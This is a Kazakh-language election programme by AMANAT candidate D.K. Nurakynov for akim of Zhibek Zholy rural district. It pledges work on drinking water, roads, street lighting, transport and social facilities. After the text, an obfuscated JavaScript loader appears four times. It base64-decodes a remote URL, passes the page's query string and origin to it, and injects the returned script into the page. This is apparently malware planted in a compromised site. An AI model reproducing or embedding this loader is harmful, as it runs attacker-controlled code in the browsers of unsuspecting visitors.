Алматы облысы Қарасай ауданы Жібек жолы ауылдық округі әкімінің сайлауына «AMANAT» партиясынан үміткер Нұрақынов Дидар Құрманжанұлының 2024-2028 жылдарға арналған сайлауалды бағдарламасы
Құрметті жерлестер!
Мен, Нұрақынов Дидар Құрманжанұлы Алматы облысы Жамбыл ауданы Ақши ауылында дүниеге келдім.
Еңбек жолымды Алматы облысы Қарасай ауданы Шамалған станциясындағы Ы. Алтынсарин атындағы орта мектебінің дене шынықтыру пәнінің мұғалімі қызметінен бастадым.(2011 – 2017). Алматы облысы “Қарасай ауданы Жаңашамалған ауылдық округі әкімінің аппараты ” ММ спорт жөніндегі нұсқаушысы (2014 – 2017). Алматы облысы ” Қарасай ауданы Үшқоңыр ауылдық округі әкімінің аппараты ” ММ спорт жөніндегі нұсқаушысы (2017 – 2018). Алматы облысы ” Қарасай ауданы Үшқоңыр ауылдық округі әкімінің аппараты ” ММ бас маманы (2018 – 2019). Алматы облысы ” Қарасай ауданы Жаңашамалған ауылдық округі әкімінің аппараты ” ММ спорт жөніндегі нұсқаушысы(2018 – 2019). Алматы облысы Қарасай ауданы Шамалған станциясындағы Ы. Алтынсарин атындағы орта мектебінің дене шынықтыру пәнінің мұғалімі (2019 – 2022). Алматы облысы ” Қарасай ауданы Жібек жолы ауылдық округі әкімінің аппараты ” ММ жетекші маманы (2020 – 2022). Алматы облысы ” Қарасай ауданының Жібек жолы ауылдық округі әкімінің аппараты ” ММ әкімінің орынбасары (04.07.07.2022 жылдан бастап).
Мен өз елімнің шынайы патриоты ретінде округ тұрғындарының әлеуметтік іін жақсартуға межелі мақсаттар қойдым. Алдымызда атқарылар жұмыс көп. Халықпен етене-жақын араласып, барлық келелі мәселелердің түйінін бірлесе шешуге жұмылуымыз қажет деп білемін. Округ тұрғындарының сенімі мен аманатын арқалап, сайлауалды бағдарламасының жүзеге асуына барлық күш-жігерімді, тәжірибиемді, білімімді жұмсауға дайынмын. Халықтың әлеуметтік өмірін жақсарту үшін мен болашақта, Жібек жолы ауылдық округінің көшелерін жарықтандыруға және ауыл жолдарын, ауыз-су жүйелерін жөндеу жұмыстарының жүргізілуіне бар күшімді саламын.
Менің ұраным іскерлік-жауапкершілік-заң және тәртіп
Жібек жолы ауылдық округі әкіміне өз кандидатурамды ұсына отырып, ауылдық округ тұрғындары алдындағы үлкен жауапкершілікті терең түсінемін. Өздеріңізге мәлім мен осы ауылымыздың азаматымын. Округ әкімдігінде 2014 жылдан бері қызмет жасаймын. 2022 жылдың маусым айынан бастап округ әкімінің орынбасары ретінде тағайындалдым. Ауылымызда шешімін таппай жатқан қордаланған мәселе өте көп. Жібек жолы ауылдық округінің әкімі болып сайланып жатсам осы уақытқа дейін жинаған барлық тәжірибиемді,білімімді округіміздің жан жақты дамытуға жұмыс жасаймын.
Сіздерге халықтың әлеуметтік өмірін жақсарту мақсатында 4 жылдың ішінде шешімі табылуы керек бағдарламамды ұсынамын:
- Ауыз су мәселесі: Округтегі тіркелген 41534 халықтың 29500 қазіргі таңда жер асты суын ішуде (артизан). Осы мәселені шешу мақсатында округ аумағынан Жібек жолы, Көлащы ауылдарының тұрғындарын таза ауыз сумен қамтамассыз ету үшін су мұнарасын салуға 2.8 га жер бөлінді. Мен өз тарапымнан осы төрт жылдың ішінде су мұнарасының құрылысы басталуына және халыққа таза ауыз су берілуіне жұмыс жасаймын.
- Жол мәселесі: Округ бойынша қазіргі таңда 240 көше бар. Оның 32 көшесіне асфал жабыдысы төселген. 24 көшеге қиыршық тас төгілген. Мен өз тарапымнан осы төрт жылдың ішінде округ аумағында нақты жасауды талап ететін 15 көшеге асфальт жабындысын төсетуге жұмыс жасаймын. Одан бөлек әлеуметтік нысандарға апаратын жолдарға жаяу жүргіншілерге арналған тратуар жүргізу жағын қолға аламын.
- Түнгі жарықтандыру: Округ бойынша 17 көшеде ғана түнгі жарықтандыру тартылған. Округ бойынша 240 көше бар, әрине ең төменгі көрсеткіш болып табылады. Мен өз тарапымнан осы төрт жылдың ішінде округ аумағында нақты түнгі жарықтандыруды талап ететін округ көшелерге түнгі жарықтандыру тартамын.
- Қоғамдық көлік: Қоғамдық көлік округіміздің қазіргі таңда ең өзекті мәселе болып табылады. Мен өз тарапымнан осы төрт жылдың ішінде Көлащы-Алтын орда, Жібек жолы-Тұрар-Алтын орда бағытындағы қоғамдық көліктерді жаңалатуға және Алматы 1- Жібек жолы бағытында қоғамдық көлік жүруіне жұмыс жасаймын. Одан бөлек округ аумағында мүмкіндігі шектеулі азаматтарға әлеуметтік қолдау көрсету жағын қолға аламын.
- Әлеуметтік нысандар: Округ бойынша ең қордаланған мәселелердің бірі әлеуметтік нысандардың жоқтығы. Қазіргі таңда округ әкімдігі тарапынан мәдениет үйіне, дене шынықтыру-сауықтыру кешеніне, орталық ауруханаға,өрт сөндіру депосына жер телімдері бөлінген. Мен өз тарапымнан осы төрт жылдың ішінде сол әлеуметтік нысандардың құрылысы басталып, халық игілігіне берілуне жұмыс жасаймын.
Қымбатты ауыл тұрғындары!
Алдағы сайлауда маған дауыс беріп, округ әкімі болып сайлануыма ықпал етсеңіздер, әр салада әділеттілік орнатуға бар күш-жігерімді саламын. Бұл менің азаматтық ұстанымым. Себебі Әділетті қоғам – қуатты қоғам, жасампаз қоғам! Әділетті де дамыған қоғамды бірге құрайық!
Сайлауға келіңіз! Мен үшін дауыс беріңіз!
Алматы облысы Қарасай ауданы Жібек жолы ауылдық округі әкіміне кандидат Д.Қ. Нұрақыновтың сайлау қоры қаражаты есебінен төленген
(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();